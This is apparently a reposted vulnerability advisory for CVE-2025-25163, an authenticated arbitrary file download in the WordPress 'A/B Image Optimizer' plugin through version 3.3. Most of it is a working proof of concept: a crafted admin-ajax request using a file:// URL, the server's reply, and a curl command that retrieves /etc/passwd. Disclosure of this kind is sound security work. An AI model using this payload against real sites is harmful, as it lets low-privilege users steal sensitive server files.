# CVE-2025-25163
Plugin A/B Image Optimizer <= 3.3 - Authenticated (Subscriber+) # CVE-2025-25163
Plugin A/B Image Optimizer <= 3.3 - Authenticated (Subscriber+) Arbitrary File Download
# Description
The Plugin A/B Image Optimizer plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.
## Details
- **Type**: plugin
- **Slug**: images-optimizer
- **Affected Version**: 3.3
- **CVSS Score**: 6.5
- **CVSS Rating**: Medium
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
- **CVE**: CVE-2025-25163
- **Status**: Closed
POC
---
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: wp-settings-1=product_cat_tab%3Dpop%26libraryContent%3Dbrowse; wp-settings-time-1=1739543461; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_f0174336378e6db874da2237e8c05ac1=superadmin%7C1740046038%7C1N8xr9D0vHFOPOWEa8SZgQgnMrADwNBlBuy2clxo5pS%7C1e77f848b7d3c4d32746de6c747e981273be0adb56efe08902946257e29284fe; tk_ai=woo%3AHJ877y%2BjNWutqlxgSuyOlVs2; woocommerce_items_in_cart=1; woocommerce_cart_hash=00dd4812a167442476e6e7ea663fc03e; wp_woocommerce_session_f0174336378e6db874da2237e8c05ac1=1%7C%7C1740046039%7C%7C1740042439%7C%7C81057c84ecef3df59f0857082ef7c538
Priority: u=4
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
action=ab_save_image_locally&imageUrl=file:///etc/passwd
```
```
{"id":5006,"url":"http:\/\/kubernetes.docker.internal:8929\/wp-content\/uploads\/2025\/02\/1739874247.gif"}
```
```
$ curl http://kubernetes.docker.internal:8929/wp-content/uploads/2025/02/1739874247.gif
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
```
WordPress Plugin A/B Image Optimizer 3.3 Arbitrary File Download
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 51